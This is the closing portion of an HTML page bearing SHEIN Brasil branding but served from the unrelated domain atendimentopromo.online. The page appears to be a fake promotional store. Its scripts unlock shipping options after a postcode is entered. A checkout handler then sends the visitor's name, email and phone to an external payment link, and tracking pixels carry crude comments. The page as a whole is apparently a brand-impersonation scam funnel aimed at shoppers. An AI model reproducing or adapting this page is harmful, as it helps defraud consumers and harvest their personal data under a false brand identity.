			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-29ee3ee7 elementor-widget elementor-widget-html" data-id="29ee3ee7" data-element_type="widget" data-widget_type="html.default">
				<div class="elementor-widget-container">
			<script>
document.addEventListener('DOMContentLoaded', function () {
    const cepInput = document.getElementById('cep');
    const freteBtn = document.getElementById('freteBtn');
    const divs1 = document.querySelectorAll('.id1');
    const divs2 = document.querySelectorAll('.id2');

    // Função para validar o CEP
    function validarCEP() {
        // Remove todos os caracteres não numéricos
        const numericCep = cepInput.value.replace(/[^\d]/g, '');
        
        // Verifica se há pelo menos 8 dígitos numéricos
        if (numericCep.length >= 8) {
            freteBtn.classList.add('active');
            freteBtn.disabled = false;
        } else {
            freteBtn.classList.remove('active');
            freteBtn.disabled = true;
        }
    }

    // Evento de input no campo de CEP
    cepInput.addEventListener('input', validarCEP);

    // Evento de clique no botão
    freteBtn.addEventListener('click', function () {
        // Oculta todos os elementos com a classe 'id1'
        divs1.forEach(div => {
            div.style.display = 'none';
        });
        // Exibe todos os elementos com a classe 'id2'
        divs2.forEach(div => {
            div.style.setProperty('display', 'block', 'important'); // Sobrescreve o display: none !important
        });
    });
});
</script>

		</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				<section class="elementor-section elementor-top-section elementor-element elementor-element-41585597 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="41585597" data-element_type="section">
							<div class="elementor-background-overlay"></div>
							<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-79df8799" data-id="79df8799" data-element_type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-3add0eb elementor-widget elementor-widget-text-editor" data-id="3add0eb" data-element_type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
							<p>SHEIN Brasil – Copyright 2024<br>Todos os direitos reservados.</p>						</div>
				</div>
					</div>
		</div>
				<div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-586ede8f elementor-hidden-tablet elementor-hidden-mobile" data-id="586ede8f" data-element_type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-3ab6fccb elementor-widget__width-auto elementor-widget elementor-widget-heading" data-id="3ab6fccb" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
			<h2 class="elementor-heading-title elementor-size-default">Políticas</h2>		</div>
				</div>
				<div class="elementor-element elementor-element-1b2f5b6b elementor-icon-list--layout-inline elementor-widget__width-auto elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="1b2f5b6b" data-element_type="widget" data-widget_type="icon-list.default">
				<div class="elementor-widget-container">
					<ul class="elementor-icon-list-items elementor-inline-items">
							<li class="elementor-icon-list-item elementor-inline-item">
											<span class="elementor-icon-list-icon">
							<i aria-hidden="true" class="fas fa-chevron-right"></i>						</span>
										<span class="elementor-icon-list-text">Políticas de privacidade</span>
									</li>
								<li class="elementor-icon-list-item elementor-inline-item">
											<span class="elementor-icon-list-icon">
							<i aria-hidden="true" class="fas fa-chevron-right"></i>						</span>
										<span class="elementor-icon-list-text">Termos de uso</span>
									</li>
						</ul>
				</div>
				</div>
					</div>
		</div>
				<div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-5ecd1bbf elementor-hidden-desktop" data-id="5ecd1bbf" data-element_type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-6ba6994e elementor-widget elementor-widget-heading" data-id="6ba6994e" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
			<h2 class="elementor-heading-title elementor-size-default">Políticas</h2>		</div>
				</div>
				<div class="elementor-element elementor-element-6eec307c elementor-icon-list--layout-inline elementor-mobile-align-center elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="6eec307c" data-element_type="widget" data-widget_type="icon-list.default">
				<div class="elementor-widget-container">
					<ul class="elementor-icon-list-items elementor-inline-items">
							<li class="elementor-icon-list-item elementor-inline-item">
											<span class="elementor-icon-list-icon">
							<i aria-hidden="true" class="fas fa-chevron-right"></i>						</span>
										<span class="elementor-icon-list-text">Políticas de privacidade</span>
									</li>
								<li class="elementor-icon-list-item elementor-inline-item">
											<span class="elementor-icon-list-icon">
							<i aria-hidden="true" class="fas fa-chevron-right"></i>						</span>
										<span class="elementor-icon-list-text">Termos de uso</span>
									</li>
						</ul>
				</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				</div>
					<script type="text/javascript">
				const lazyloadRunObserver = () => {
					const lazyloadBackgrounds = document.querySelectorAll( `.e-con.e-parent:not(.e-lazyloaded)` );
					const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => {
						entries.forEach( ( entry ) => {
							if ( entry.isIntersecting ) {
								let lazyloadBackground = entry.target;
								if( lazyloadBackground ) {
									lazyloadBackground.classList.add( 'e-lazyloaded' );
								}
								lazyloadBackgroundObserver.unobserve( entry.target );
							}
						});
					}, { rootMargin: '200px 0px 200px 0px' } );
					lazyloadBackgrounds.forEach( ( lazyloadBackground ) => {
						lazyloadBackgroundObserver.observe( lazyloadBackground );
					} );
				};
				const events = [
					'DOMContentLoaded',
					'elementor/lazyload/observe',
				];
				events.forEach( ( event ) => {
					document.addEventListener( event, lazyloadRunObserver );
				} );
			</script>
			<script src="js/hello-frontend.min.js" id="hello-theme-frontend-js"></script>
<script src="js/jquery-numerator.min.js" id="jquery-numerator-js"></script>
<script src="js/webpack-pro.runtime.min.js" id="elementor-pro-webpack-runtime-js"></script>
<script src="js/webpack.runtime.min.js" id="elementor-webpack-runtime-js"></script>
<script src="js/frontend-modules.min.js" id="elementor-frontend-modules-js"></script>
<script src="js/hooks.min.js" id="wp-hooks-js"></script>
<script src="js/i18n.min.js" id="wp-i18n-js"></script>
<script id="wp-i18n-js-after">
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script id="elementor-pro-frontend-js-before">
var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/atendimentopromo.online\/wp-admin\/admin-ajax.php","nonce":"65d893c0f5","urls":{"assets":"https:\/\/atendimentopromo.online\/wp-content\/plugins\/elementor-pro\/assets\/","rest":"https:\/\/atendimentopromo.online\/wp-json\/"},"shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"mix":{"title":"Mix"},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"}},"facebook_sdk":{"lang":"pt_BR","app_id":""},"lottie":{"defaultAnimationUrl":"https:\/\/atendimentopromo.online\/wp-content\/plugins\/elementor-pro\/modules\/lottie\/assets\/animations\/default.json"}};
</script>
<script src="js/frontend.min.js" id="elementor-pro-frontend-js"></script>
<script src="js/core.min.js" id="jquery-ui-core-js"></script>
<script id="elementor-frontend-js-before">
var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Compartilhar no Facebook","shareOnTwitter":"Compartilhar no Twitter","pinIt":"Fixar","download":"Baixar","downloadImage":"Baixar imagem","fullscreen":"Tela cheia","zoom":"Zoom","share":"Compartilhar","playVideo":"Reproduzir v\u00eddeo","previous":"Anterior","next":"Pr\u00f3ximo","close":"Fechar","a11yCarouselWrapperAriaLabel":"Carrossel | Rolagem horizontal: Setas para esquerda e direita","a11yCarouselPrevSlideMessage":"Slide anterior","a11yCarouselNextSlideMessage":"Pr\u00f3ximo slide","a11yCarouselFirstSlideMessage":"Este \u00e9 o primeiro slide","a11yCarouselLastSlideMessage":"Este \u00e9 o \u00faltimo slide","a11yCarouselPaginationBulletMessage":"Ir para o slide"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"Dispositivos m\u00f3veis no modo retrato","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"Dispositivos m\u00f3veis no modo paisagem","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"Tablet no modo retrato","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"Tablet no modo paisagem","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"Notebook","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"Tela ampla (widescreen)","value":2400,"default_value":2400,"direction":"min","is_enabled":false}},"hasCustomBreakpoints":false},"version":"3.24.6","is_static":false,"experimentalFeatures":{"additional_custom_breakpoints":true,"container_grid":true,"e_swiper_latest":true,"e_nested_atomic_repeaters":true,"e_onboarding":true,"theme_builder_v2":true,"hello-theme-header-footer":true,"home_screen":true,"ai-layout":true,"landing-pages":true,"link-in-bio":true,"floating-buttons":true,"page-transitions":true,"notes":true,"form-submissions":true,"e_scroll_snap":true},"urls":{"assets":"https:\/\/atendimentopromo.online\/wp-content\/plugins\/elementor\/assets\/","ajaxurl":"https:\/\/atendimentopromo.online\/wp-admin\/admin-ajax.php","uploadUrl":"https:\/\/atendimentopromo.online\/wp-content\/uploads"},"nonces":{"floatingButtonsClickTracking":"19a7ad0b5a"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"active_breakpoints":["viewport_mobile","viewport_tablet"],"global_image_lightbox":"yes","lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description","hello_header_logo_type":"title","hello_header_menu_layout":"horizontal","hello_footer_logo_type":"logo"},"post":{"id":98,"title":"D158-SH-8%20%E2%80%93%20atendimentopromo.online","excerpt":"","featuredImage":false}};
</script>
<script src="js/frontend.min_1.js" id="elementor-frontend-js"></script>
<script src="js/preloaded-elements-handlers.min.js" id="pro-preloaded-elements-handlers-js"></script>
<script>  window.pixelId = "672b5b4c15535779659701c3";  var a = document.createElement("script");  a.setAttribute("async", "");  a.setAttribute("defer", "");  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");  document.head.appendChild(a);</script>
	
<script>
document.getElementById("ir-pagamento").addEventListener("click", function() {
    // Captura os valores dos inputs
    let nome = encodeURIComponent(document.getElementById("nome").value);
    let email = encodeURIComponent(document.getElementById("email").value);
    let telefone = encodeURIComponent(document.getElementById("numero").value);

    // Obtém o frete selecionado
    let freteSelecionado = document.querySelector(".frete-option input[type='radio']:checked");
    
    if (!freteSelecionado) {
        alert("Por favor, selecione uma opção de frete.");
        return;
    }

    // Obtém o link original do frete selecionado
    let linkFrete = freteSelecionado.closest(".frete-option").getAttribute("data-link");

    // Adiciona os parâmetros na URL
    let urlFinal = `${linkFrete}?hidecard=1&name=${nome}&email=${email}&phone=${telefone}`;

    // Redireciona para o link atualizado
    window.location.href = urlFinal;
});
</script>

<!-- Meta Pixel Code -->
<script>
  !function(f,b,e,v,n,t,s)
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};
  if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
  n.queue=[];t=b.createElement(e);t.async=!0;
  t.src='https://connect.facebook.net/en_US/fbevents.js';
  s=b.getElementsByTagName(e)[0];
  s.parentNode.insertBefore(t,s)}(window, document,'script');

  fbq('init', '2426728481027007'); // ID do pixel seu aí, porra
  fbq('track', 'PageView'); // Essa porra rastreia quando a página é aberta
</script>
<noscript>
  <img height="1" width="1" style="display:none"
       src="https://www.facebook.com/tr?id=2426728481027007&ev=PageView&noscript=1"/>
</noscript>
<!-- End Meta Pixel Code -->

</body></html><!-- Page cached by LiteSpeed Cache 6.5.2 on 2024-11-04 23:38:23 -->

